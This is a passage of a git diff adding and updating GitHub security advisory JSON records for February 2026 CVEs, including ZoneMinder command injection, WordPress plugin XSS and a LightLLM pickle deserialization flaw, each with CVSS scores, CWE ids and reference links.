"GHSA-xqpr-gx4w-53xf", + "modified": "2026-02-16T03:30:17Z", + "published": "2026-02-16T03:30:17Z", + "aliases": [ + "CVE-2026-2525" + ], + "details": "A vulnerability has been found in Free5GC up to 4.1.0. This affects an unknown function of the component PFCP UDP Endpoint. Such manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2525" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/796" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/796#issue-3812169865" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346113" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346113" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.739509" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T02:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json b/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json index abed4a8950f0f..f4969b6bf2b54 100644 --- a/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json +++ b/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xrh7-29mh-fp98", - "modified": "2026-02-04T15:30:29Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-04T15:30:29Z", "aliases": [ "CVE-2025-69618" ], "details": "An arbitrary file overwrite vulnerability in the file import process of Tarot, Astro & Healing v11.4.0 allows attackers to overwrite critical internal files, potentially leading to arbitrary code execution or exposure of sensitive information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T15:16:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json new file mode 100644 index 0000000000000..d335397c9f0a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrj7-v4x4-74hr", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-8860" + ], + "details": "A flaw was found in QEMU in the uefi-vars virtual device. When the guest writes to register UEFI_VARS_REG_BUFFER_SIZE, the .write callback `uefi_vars_write` is invoked. The function allocates a heap buffer without zeroing the memory, leaving the buffer filled with residual data from prior allocations. When the guest later reads from register UEFI_VARS_REG_PIO_BUFFER_TRANSFER, the .read callback `uefi_vars_read` returns leftover metadata or other sensitive process memory from the previously allocated buffer, leading to an information disclosure vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387588" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-212" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json new file mode 100644 index 0000000000000..175244e5405e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrqq-m9vv-pq36", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20619" + ], + "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An app may be able to access sensitive user data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20619" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xv85-h7cp-9wff/GHSA-xv85-h7cp-9wff.json b/advisories/unreviewed/2026/02/GHSA-xv85-h7cp-9wff/GHSA-xv85-h7cp-9wff.json new file mode 100644 index 0000000000000..eb9d20a5acdd3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xv85-h7cp-9wff/GHSA-xv85-h7cp-9wff.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv85-h7cp-9wff", + "modified": "2026-02-14T06:30:57Z", + "published": "2026-02-14T06:30:57Z", + "aliases": [ + "CVE-2026-26296" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26296" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json new file mode 100644 index 0000000000000..a5aca835cc3f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw2v-8hw2-2rc4", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26370" + ], + "details": "WordPress Plugin \"Survey Maker\" versions 5.1.7.7 and prior contain a cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26370" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN20049394" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/survey-maker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T08:17:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json new file mode 100644 index 0000000000000..3c8a8c96cec47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-fccw-fgc4", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65791" + ], + "details": "ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65791" + }, + { + "type": "WEB", + "url": "https://github.com/rishavand1/CVE-2025-65791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json new file mode 100644 index 0000000000000..ee81c183161eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw8j-p597-rjrj", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20680" + ], + "details": "The issue was addressed with additional restrictions on the observability of app states. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, iOS 26.3 and iPadOS 26.3. A sandboxed app may be able to access sensitive user data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20680" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json b/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json new file mode 100644 index 0000000000000..0c68b580efe5d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwc9-vwhh-qfwc", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23606" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Advanced Content Filtering rule creation workflow. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pv1$txtRuleName parameter to /MailEssentials/pages/MailSecurity/advancedfiltering.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23606" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-advanced-content-filtering-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json b/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json new file mode 100644 index 0000000000000..a1102b19ebc59 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwm4-xpf9-mh28", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25402" + ], + "details": "Missing Authorization vulnerability in echoplugins Knowledge Base for Documentation, FAQs with AI Assistance echo-knowledge-base allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Knowledge Base for Documentation, FAQs with AI Assistance: from n/a through <= 16.011.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25402" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/echo-knowledge-base/vulnerability/wordpress-knowledge-base-for-documentation-faqs-with-ai-assistance-plugin-16-011-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwq7-47qj-qwwf/GHSA-xwq7-47qj-qwwf.json b/advisories/unreviewed/2026/02/GHSA-xwq7-47qj-qwwf/GHSA-xwq7-47qj-qwwf.json new file mode 100644 index 0000000000000..3cb8f9856bd97 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwq7-47qj-qwwf/GHSA-xwq7-47qj-qwwf.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwq7-47qj-qwwf", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23177" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm, shmem: prevent infinite loop on truncate race\n\nWhen truncating a large swap entry, shmem_free_swap() returns 0 when the\nentry's index doesn't match the given index due to lookup alignment. The\nfailure fallback path checks if the entry crosses the end border and\naborts when it happens, so truncate won't erase an unexpected entry or\nrange. But one scenario was ignored.\n\nWhen `index` points to the middle of a large swap entry, and the large\nswap entry doesn't go across the end border, find_get_entries() will\nreturn that large swap entry as the first item in the batch with\n`indices[0]` equal to `index`. The entry's base index will be smaller\nthan `indices[0]`, so shmem_free_swap() will fail and return 0 due to the\n\"base < index\" check. The code will then call shmem_confirm_swap(), get\nthe order, check if it crosses the END boundary (which it doesn't), and\nretry with the same index.\n\nThe next iteration will find the same entry again at the same index with\nsame indices, leading to an infinite loop.\n\nFix this by retrying with a round-down index, and abort if the index is\nsmaller than the truncate range.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23177" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2030dddf95451b4e7a389f052091e7c4b7b274c6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7b6a0f121d50234aab3e7ab9a62ebe826d40a32a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dfc3ab6bd64860f8022d69903be299d09be86e11" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json b/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json new file mode 100644 index 0000000000000..3ce1d48597cc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwqg-rc23-pwjj", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12975" + ], + "details": "The CTX Feed – WooCommerce Product Feed Manager plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the woo_feed_plugin_installing() function in all versions up to, and including, 6.6.11. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to install arbitrary plugins which can be leveraged to achieve remote code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12975" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417230%40webappick-product-feed-for-woocommerce&new=3417230%40webappick-product-feed-for-woocommerce&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/webappick-product-feed-for-woocommerce" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f77f4cd-f4b3-42bc-a1a9-e5df5daa42b7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json b/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json new file mode 100644 index 0000000000000..e509217650400 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xxg6-fj84-6x42/GHSA-xxg6-fj84-6x42.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxg6-fj84-6x42", + "modified": "2026-02-11T06:30:41Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2026-26044" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26044" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xxhc-j59w-qj54/GHSA-xxhc-j59w-qj54.json b/advisories/unreviewed/2026/02/GHSA-xxhc-j59w-qj54/GHSA-xxhc-j59w-qj54.json new file mode 100644 index 0000000000000..6863f1cd4e9ba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xxhc-j59w-qj54/GHSA-xxhc-j59w-qj54.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxhc-j59w-qj54", + "modified": "2026-02-16T18:31:29Z", + "published": "2026-02-16T18:31:29Z", + "aliases": [ + "CVE-2019-25393" + ], + "details": "Smoothwall Express 3.1-SP4-polar-x86_64-update9 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by exploiting insufficient input validation. Attackers can submit POST requests to the smoothinfo.cgi endpoint with script payloads in the WRAP or SECTIONTITLE parameters to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25393" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46333" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/smoothwall-express-smoothinfocgi-cross-site-script" + }, + { + "type": "WEB", + "url": "http://www.smoothwall.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T18:19:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json b/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json new file mode 100644 index 0000000000000..cb6abd7d82744 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxv9-73gc-96fm", + "modified": "2026-02-17T03:30:15Z", + "published": "2026-02-17T03:30:15Z", + "aliases": [ + "CVE-2026-26220" + ], + "details": "LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26220" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/LightLLM/issues/1213" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/lightllm-pickle-rce" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/lightllm/blob/a27dfc88c2144ed51a6e160b6fbe20aad66c8fe0/lightllm/server/api_http.py#L310" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/lightllm/blob/a27dfc88c2144ed51a6e160b6fbe20aad66c8fe0/lightllm/server/api_http.py#L331" + }, + { + "type": "WEB", + "url": "https://lightllm-en.readthedocs.io/en/latest/index.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/lightllm-pd-mode-unsafe-deserialization-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T03:16:01Z" + } +} \ No newline at end of file